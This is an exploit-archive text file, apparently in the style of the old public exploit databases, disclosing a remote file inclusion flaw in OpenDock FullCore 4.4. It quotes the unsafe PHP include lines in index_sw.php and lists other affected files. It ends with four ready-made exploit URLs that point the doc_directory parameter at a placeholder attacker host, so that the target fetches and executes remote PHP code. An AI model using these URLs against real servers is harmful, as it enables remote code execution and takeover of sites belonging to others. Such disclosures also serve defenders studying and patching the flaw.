-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path1005.txt
64 lines (39 loc) · 2.11 KB
/
1005.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
OpenDock FullCore <= 4.4 Remote File Include Vulnerabilities
============================================================
---------------------------------------------------------------------------------
OpenDock FullCore <= v4.4 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------
Author : Matdhule
Application : OpenDock FullCore
Version : 4.4
---------------------------------------------------------------------------------
Vulnerability:
In folder sw we found vulnerability script index_sw.php.
-----------------------index_sw.php---------------------------------
<?php
include $doc_directory.$path_sw."lib_config/lib_sys_config.php";
include $doc_directory.$path_sw."lib_main/lib_main.php";
-------------------------------------------------------------------------
Input passed to the "$doc_directory" parameter in index_sw.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.
Also affected files on Files:
sw/lib_cart/cart.php
sw/lib_cart/lib_cart.php
sw/lib_cart/lib_read_cart.php
sw/lib_cart/lib_sys_cart.php
sw/lib_cart/txt_info_cart.php
sw/lib_comment/comment.php
sw/lib_comment/find_comment.php
sw/lib_comment/lib_comment.php
sw/lib_find/find.php
And many others files...
---------------------------------------------------------------------------------
Exploit :
http://target.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://attacker.com/inject.txt ?
http://target.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt ?
---------------------------------------------------------------------------------
Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, bius, thama & all crews #nyubicrew, #e-c-h-o, @dalnet